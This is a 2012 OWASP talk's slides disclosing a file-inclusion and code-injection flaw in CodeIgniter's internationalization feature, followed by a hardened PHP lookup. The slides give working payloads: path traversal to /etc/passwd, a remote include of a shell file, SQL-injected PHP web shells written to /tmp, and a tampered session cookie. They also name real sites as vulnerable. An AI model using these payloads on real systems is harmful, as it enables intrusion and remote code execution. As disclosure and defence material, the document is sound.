CodeIgniter i18n Security Flaw

This demonstrates an LFI (local file inclusion) security flaw in the internationalization feature of CodeIgniter, the famous PHP framework.
This was coined by me, and used to exploit numerous CodeIgniter-powered websites. Currently reported and fixed.


  1. 20 May 2012: CodeIgniter i18n Code Injection
     Abbas Naderi (aka AbiusX)
     OWASP Chapter Leader of Iran
     ISSECO Member
     abbas.naderi@owasp.org / me@abiusx.com
  2. Understand the Context
  3. PHP
     • Mostly used SSI (75%)
     • 17 Years Maturity
     • Open Source Nature
     • Rapid Develop/Deploy
     • Secure Core
     • Insecure Libraries
     • Low Level Web Development *
  4. PHP Frameworks
     • PHP low level web support
     • Incorporation of Frameworks
     • Much Used and Mature -> Secure
     • Huge Codebase -> Insecure
     • Developers, not Security guys
     • Security-Oriented Frameworks (OWASP ESAPI)
  5. CodeIgniter
     • Most used Mid-level Framework
  6. Internationalization
     • i18n importance today
     • Difficult implementation:
       - File-based (WordPress, eFront, …)
       - Database (jFramework)
       - Code-based (CodeIgniter, …)
     • Obsolete consumers -> No testing
  7. Remote File Inclusion
  8. RFI at a glance
     • 3rd Most Common Vuln. in Top Ten 2007: Malicious File Inclusion
     • Not in Top Ten 2010: Mostly Understood and Fixed
     • Highest Impact (Run Arbitrary Code!)
     • Common in Interpreted Languages
     • Most Common in PHP (Why?)
  9. RFI Example
     <?php
     $page = $_GET['page'];
     include "./pages/{$page}.php";

     Malicious Input:
     mysite.com?page=../../../etc/passwd%00
     Where current dir is /var/www:
     include "/var/www/pages/../../../etc/passwd";
     = include "/etc/passwd"; // show it on screen
  10. RFI Cheatsheet
      Use null character on input to terminate string:
      include "./{$page}.you.cant.rfi.me.php";
      Use absolute paths if input initiates include:
      include "{$_GET['page']}";
      page=http://abx.ir/shell.txt%00
  11. allow_url_include
  12. Filter Parameters
      • CodeIgniter has the least found exploits of all major PHP frameworks (Commercial Codebase)
      • CodeIgniter filters dangerous characters such as ', ", /, ?, <, > on GET parameters, to prevent most XSS and Injection attacks.
      • CodeIgniter has a central module loader, and MVC pattern, preventing most RFIs.
  13. Internationalization
  14. Internationalization (II)
  15. Local File Inclusion
      • Useful to extract info. from target system
        - /etc/passwd
        - ./config/database.php
      • Easy to exploit
  16. Local Code Inclusion
      • Requires a blind injection:
        - ' and 1=0 union select "<?php echo shell_exec($_REQUEST[q]);" into outfile "/tmp/sales_lang.php" --
        - CodeIgniter filters <? from input
        - ' and 1=0 union select unhex("3c3f706870206563686f207368656c6c5f6578656328245f524551554553545b715d29") into outfile "/tmp/common_lang.php" --
        - Caution: into outfile does not overwrite!
        - Where to find blind injection?
  17. Local Code Inclusion (II)
      • Now change cookie from
        - a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A%22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A%22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A%22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965bad
        - To lang%22%3Bs%3A2%3A%22../../../../../tmp
  18. Remote Code Inclusion
      • Look at the code:
        include($package_path.'language/'.$idiom.'/'.$langfile);
      • You a hacker? Tell me how!
  19. Remote Code Inclusion (II)
      $this->load->add_package_path()
      Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following:
      $this->load->add_package_path(APPPATH.'third_party/foo_bar/');
      http://codeigniter.com/user_guide/libraries/loader.html
  20. Demonstration
  21. CodeIgniter + i18n
      • More than 240 sites discovered:
        - http://www.sedoparking.com
        - http://bambooinvoice.org/
        - http://www.haughin.com/
        - http://www.rapyd.com/
        - http://code-igniter.ru/
      • And tons more…
  22. Questions? Feedback?
      Abbas Naderi (aka AbiusX)
      OWASP Chapter Leader of Iran
      ISSECO Member
      abiusx@acm.org / me@abiusx.com
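As an added example (not from the slides and not CodeIgniter's own code), here is the path construction from slide 18 beside a hardened lookup an application could use instead: the idiom is checked against an allow-list, the file name is constrained to `<name>_lang.php`, and realpath() proves the result still sits under language/. The function names, the ENABLED_LANGS list and the throw-away demo directory are all assumptions.

```php
<?php
// Added example, not CodeIgniter's own code: a hardened replacement for the
// language-file path that slide 18 builds directly from $idiom.
declare(strict_types=1);

// Assumed config: the only languages this application actually ships.
const ENABLED_LANGS = ['english', 'fa'];

// The pattern from the slides: $idiom comes from a cookie or GET value and is
// concatenated straight into the include path, so "../" walks out of the tree.
function lang_path_unsafe(string $base, string $idiom, string $langfile): string
{
    return $base . 'language/' . $idiom . '/' . $langfile;
}

// Hardened version: allow-list the idiom, constrain the file name, then prove
// with realpath() that the resolved file still sits under language/.
// Returns the resolved path, or null when the request must be refused.
function lang_path_safe(string $base, string $idiom, string $langfile): ?string
{
    if (!in_array($idiom, ENABLED_LANGS, true)) {
        return null;                       // unknown idiom or traversal attempt
    }
    // Only "<name>_lang.php", no separators, no NUL bytes, nothing else.
    if (!preg_match('/\A[a-z0-9_]+_lang\.php\z/', $langfile)) {
        return null;
    }
    $root = realpath($base . 'language');
    $real = realpath($base . 'language/' . $idiom . '/' . $langfile);
    if ($root === false || $real === false) {
        return null;                       // directory or file does not exist
    }
    // realpath() has collapsed any "..", so a prefix match proves containment.
    if (strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo: a throw-away package directory with one real language file.
$base = sys_get_temp_dir() . '/ci_i18n_demo_' . getmypid() . '/';
mkdir($base . 'language/english', 0700, true);
file_put_contents($base . 'language/english/common_lang.php', "<?php \$lang['hi'] = 'Hello';\n");

echo "safe, english:     ", var_export(lang_path_safe($base, 'english', 'common_lang.php'), true), "\n";
echo "safe, traversal:   ", var_export(lang_path_safe($base, '../../../../../tmp', 'common_lang.php'), true), "\n";
echo "unsafe, traversal: ", lang_path_unsafe($base, '../../../../../tmp', 'common_lang.php'), "\n";
```

The allow-list alone already stops the slide's traversal; the realpath() containment check is defence in depth for the case where the list is later replaced by a looser pattern.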
